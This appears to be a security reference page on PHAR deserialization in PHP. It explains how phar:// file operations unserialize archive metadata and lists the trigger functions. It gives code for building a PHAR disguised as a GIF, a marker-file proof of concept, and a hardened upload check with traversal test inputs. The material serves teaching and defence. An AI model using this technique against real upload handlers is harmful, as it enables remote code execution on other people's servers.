PHAR Deserialization

PHAR Deserialization is a PHP vulnerability class in which opening a PHAR (PHP Archive) through the phar:// stream wrapper causes the archive's manifest metadata to be passed to unserialize(), which can lead to object injection and code execution. It is dangerous because the trigger is an ordinary file-system call (file_exists(), getimagesize(), ...) that is not normally associated with deserialization: the wrapper parses the archive before the function does anything else with it. Since PHP 8.0 the metadata is no longer unserialized automatically and is only parsed when Phar::getMetadata() or PharFileInfo::getMetadata() is called explicitly, so the classic trigger applies to PHP 5.3 through 7.4 and, on newer versions, only to code that asks for the metadata itself.

How It Works

A PHAR file consists of a stub (arbitrary bytes ending in __HALT_COMPILER();), a manifest and the archived files. The manifest carries optional metadata stored as a serialize()d PHP value. When PHP opens the archive through the phar:// stream wrapper it parses the manifest and, on PHP < 8.0, immediately unserializes that metadata, so any class in the metadata is instantiated and its magic methods (__wakeup, __destruct, __toString, ...) run. The wrapper identifies a PHAR by looking for the __HALT_COMPILER(); token in the stub, not by the file extension, so the archive can be uploaded as avatar.jpg. An attacker therefore needs to get the file onto the server and to control the beginning of a path passed to a file function, so that phar:// can be prepended; the gadget chain inside the metadata then does the rest.

Vulnerable Functions

// Any file operation that goes through the stream-wrapper layer triggers the
// manifest parse (and, on PHP < 8.0, the unserialize) when the path starts
// with phar://. The archive does not need a .phar extension.
file_exists('phar://uploads/malicious.phar');
file_get_contents('phar://uploads/malicious.phar');
filesize('phar://uploads/malicious.phar');
is_file('phar://uploads/malicious.phar');
is_dir('phar://uploads/malicious.phar');
filemtime('phar://uploads/malicious.phar');
md5_file('phar://uploads/malicious.phar');
copy('phar://uploads/malicious.phar', '/tmp/x');
fopen('phar://uploads/malicious.phar', 'r');
include('phar://uploads/malicious.phar');

// Even image functions, which many upload handlers call to "validate" a file!
getimagesize('phar://uploads/malicious.phar');
exif_read_data('phar://uploads/malicious.phar');

// No trigger: the wrapper is only honoured as a path prefix, so an attacker
// must control the start of the path, not just the file name.
file_exists('uploads/malicious.phar');

Creating Malicious PHAR

// Generating an archive requires phar.readonly=0 (e.g. php -d phar.readonly=0 gen.php),
// and the Phar class insists on a .phar extension while the archive is being written.
$phar = new Phar('malicious.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
// The stub only has to end in __HALT_COMPILER(); prefixing image magic bytes
// such as "GIF89a" lets the file pass getimagesize()-style upload checks.
$phar->setStub('<?php __HALT_COMPILER(); ?>');

// Inject the gadget chain as metadata: VulnerableClass stands for a class in the
// target's code base whose __destruct/__wakeup/__toString reaches a dangerous sink.
// setMetadata() serialize()s the object into the manifest.
$object = new VulnerableClass();
$phar->setMetadata($object);
$phar->stopBuffering();
// Afterwards rename the file to whatever the upload filter expects (avatar.jpg, ...):
// the phar:// wrapper never looks at the extension.
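The following end-to-end script ties the "How It Works" and "Creating Malicious PHAR" sections together. It is an added example, not code from the original page: it builds an archive that getimagesize() accepts as a GIF, renames it to avatar.jpg, and then triggers the manifest parse with a bare file_exists(). The WakeupGadget class, the file names and the marker file are assumptions made for the demo; a real attack reuses a class that already exists in the target or its dependencies.

```php
<?php
// Added example (not code from the original page): build a PHAR that passes as
// a GIF and trigger its metadata deserialization with file_exists().
// Generate with phar.readonly disabled:  php -d phar.readonly=0 phar_demo.php
// WakeupGadget is a hypothetical class standing in for a real gadget.

class WakeupGadget
{
    public string $path = '';
    public string $data = '';

    // Runs only when an instance is unserialized, i.e. when the victim parses
    // the PHAR manifest. Real chains more often end in __destruct/__toString;
    // __wakeup keeps this demo from firing inside the generator itself.
    public function __wakeup(): void
    {
        file_put_contents($this->path, $this->data);
    }
}

function buildDisguisedPhar(string $outFile, string $markerFile): void
{
    // The Phar class refuses to create an archive without a .phar extension,
    // so build under a temporary name and rename afterwards.
    $tmp = sys_get_temp_dir() . '/' . uniqid('poc') . '.phar';
    @unlink($tmp);
    $phar = new Phar($tmp);
    $phar->startBuffering();
    $phar->addFromString('dummy.txt', 'x');
    // A stub may start with anything as long as it ends in __HALT_COMPILER();
    // the GIF magic bytes make getimagesize() report a GIF image.
    $phar->setStub("GIF89a\n<?php __HALT_COMPILER(); ?>");
    $gadget = new WakeupGadget();
    $gadget->path = $markerFile;
    $gadget->data = 'metadata unserialized at ' . date('c');
    $phar->setMetadata($gadget);    // serialize()d into the manifest
    $phar->stopBuffering();
    rename($tmp, $outFile);          // the wrapper never looks at the extension
}

// Constructed demo paths: a fake upload and a marker the gadget will write.
$marker = sys_get_temp_dir() . '/phar_marker.txt';
$upload = sys_get_temp_dir() . '/avatar.jpg';
@unlink($marker);
buildDisguisedPhar($upload, $marker);

// What a naive upload filter sees: getimagesize() treats the file as a GIF.
$info = @getimagesize($upload);
var_dump($info ? $info['mime'] : false);

// The trigger: an apparently harmless existence check through the wrapper.
file_exists('phar://' . $upload);

// PHP < 8.0: parsing the manifest already called unserialize(), so __wakeup
// ran and the marker exists. PHP >= 8.0: the metadata stays raw until
// Phar::getMetadata() is called, and no marker appears.
var_dump(file_exists($marker));
```

Run it once under PHP 7.x and once under PHP 8.x to see the version difference the text describes; in both cases the generation step needs phar.readonly=0, while the trigger step does not, which is why the setting offers no protection to the victim.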

Attack Requirements

  • Ability to place a file with attacker-controlled content on the server; an upload disguised as an image works because the wrapper checks for the __HALT_COMPILER(); stub, not the extension
  • A file operation on a path whose beginning the attacker controls, so that phar:// can be prepended (or an application that already builds phar:// paths from user input)
  • An exploitable gadget chain: a class with a dangerous __destruct, __wakeup or __toString in the application or its dependencies, reachable through autoloading
  • PHP < 8.0, or application code that calls Phar::getMetadata() on the attacker's file
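The second requirement above is where an application can break the chain. The following added example (not code from the original page) shows an image check exposed to phar:// injection beside a hardened version that refuses stream-wrapper schemes, re-anchors the name below the upload directory, and unregisters the phar wrapper at bootstrap. UPLOAD_DIR and the function names are assumptions made for the demo.

```php
<?php
// Added example (not code from the original page): an image check that is
// exposed to phar:// injection, beside a hardened version.
// UPLOAD_DIR and the function names are assumptions for this demo.

const UPLOAD_DIR = '/var/www/uploads';

// Vulnerable: the attacker-controlled path is passed straight through.
// A request such as ?file=phar:///var/www/uploads/avatar.jpg makes
// getimagesize() open the archive and (on PHP < 8.0) unserialize its manifest
// metadata before a single pixel is inspected.
function isImageVulnerable(string $userPath): bool
{
    return @getimagesize($userPath) !== false;
}

// Hardened: accept nothing but a bare file name inside UPLOAD_DIR.
function isImageHardened(string $userPath): bool
{
    // 1. A stream wrapper is only honoured at the start of the path, so a
    //    scheme prefix is what to refuse. The case-insensitive match also
    //    catches PHAR:// and other wrappers (php://, data://, zip://, ...).
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $userPath)) {
        return false;
    }
    // 2. Collapse the input to a file name and re-anchor it under UPLOAD_DIR,
    //    which removes traversal and any remaining scheme text.
    $name = basename($userPath);
    if ($name === '' || $name === '.' || $name === '..') {
        return false;
    }
    // 3. realpath() resolves symlinks and returns false for missing files and
    //    for wrapper URLs; require the result to stay below UPLOAD_DIR.
    $base = realpath(UPLOAD_DIR);
    $full = realpath(UPLOAD_DIR . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    return @getimagesize($full) !== false;
}

// Belt and braces: if the application never legitimately reads PHAR archives,
// remove the wrapper at bootstrap so phar:// paths cannot be opened at all.
// Independently of this, PHP 8.0+ stops unserializing metadata on plain file
// access; it is parsed only when Phar::getMetadata() is called explicitly.
if (in_array('phar', stream_get_wrappers(), true)) {
    stream_wrapper_unregister('phar');
}

// Rejection paths (no upload directory is needed to exercise these).
var_dump(isImageHardened('phar:///var/www/uploads/avatar.jpg'));
var_dump(isImageHardened('PHAR://../uploads/avatar.jpg'));
var_dump(isImageHardened('../../../etc/passwd'));
```

Note that none of these checks makes the stored file itself safe: a PHAR renamed to .jpg still passes magic-byte and getimagesize() validation. If user-supplied images must be kept, re-encode them (for example through GD or Imagick) so that the bytes written to disk are freshly generated rather than the upload as received.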

See Also